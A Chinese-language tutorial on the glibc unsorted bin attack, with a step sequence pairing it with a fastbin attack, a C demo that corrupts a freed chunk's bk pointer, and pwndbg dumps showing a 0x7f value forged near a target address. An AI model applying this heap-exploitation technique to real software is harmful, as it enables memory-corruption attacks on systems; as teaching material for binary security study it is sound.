二进制安全之堆溢出(系列)—— unsorted bin attack
本文是二进制安全之堆溢出系列的第十章节,主要介绍unsorted bin attack。
原理
实现效果
只能在任意地址写入一个大数 通常在一个地址写入7f,然后配合fastbin attack使用,达到任意地址写的效果
断链操作
/* remove from unsorted list */ bck = victim->bk unsorted_chunks (av)->bk = bck; bck->fd = unsorted_chunks (av); //此时fd中存放的是main_arena的地址 unsortedbin attack之后不能在遍历`unsorted bin链了,因为此时的main_arena的bk已经被我们改为target_addr,av->bk索引到的地址是一般是无法绕过check的。 因此需要提前malloc一个fastbin大小的堆块,在unsortedbin attack之前free掉它,在unsortedbin attack之后再malloc fastbin大小的堆块。 这时就能得到一个fd为main_arena地址的chunk
unsorted bin attack 流程
malloc fastbin 0x70 free fastbin 0x70 change 0x70.fd -> target.addr malloc 0x100 free 0x100 change 0x100.addr + 0x8 ---> target malloc 0x100 --->now *(target - 0x3 ) = 0x7f malloc 0x70 --->change fastbin main_arena->fd malloc 0x70 ---> get target chunk
Demo
#include <stdio.h> #include <malloc.h> #include <unistd.h> #include <string.h> int main() { int size = 0x100; char *p = malloc(size); printf("%p\n",p); sleep(0); free(p); sleep(0); *(long *)(p+8) = 0x601100; sleep(0); char *r = malloc(size); printf("%p\n",r); sleep(0); return 0; } //此demo可以获取一个7f的大数,存在target chunk //可通过fastbin attack将此chunk取出并利用
调试
free p之后的bins链和heap
unsortedbin all: 0x602000 —? 0x7ffff7dd1b78 (main_arena+88) ?— 0x602000 pwndbg> x/20gz 0x602000 0x602000: 0x0000000000000000 0x0000000000000111 0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 -->fd和bk都指向main_arena pwndbg> x/20gz 0x00007ffff7dd1b78 0x7ffff7dd1b78 <main_arena+88>: 0x0000000000602520 0x0000000000000000 -->top chunk addr 0x7ffff7dd1b88 <main_arena+104>: 0x0000000000602000 0x0000000000602000 -->p addr
修改bk后的bins链和heap
unsortedbin all [corrupted] FD: 0x602000 —? 0x7ffff7dd1b78 (main_arena+88) ?— 0x602000 BK: 0x602000 —? 0x601100 ?— 0x0 pwndbg> x/20gz 0x602000 0x602000: 0x0000000000000000 0x0000000000000111 0x602010: 0x00007ffff7dd1b78 0x0000000000601100 -->bk的内容被修改为target.addr
malloc r之后的bins和heap
unsortedbin all [corrupted] FD: 0x602000 —? 0x7ffff7dd1b78 (main_arena+88) ?— 0x602000 BK: 0x601100 ?— 0x0 0x602000此时被malloc出去了,0x601100指向main_arena pwndbg> x/20gz 0x601100 0x601100:0x00000000000000000x0000000000000000 0x601110:0x00007ffff7dd1b780x0000000000000000 -->main_arena pwndbg> x/20gz 0x601100-0x3 0x6010fd:0x00000000000000000x0000000000000000 0x60110d:0xfff7dd1b780000000x000000000000007f ==>构造出了7f
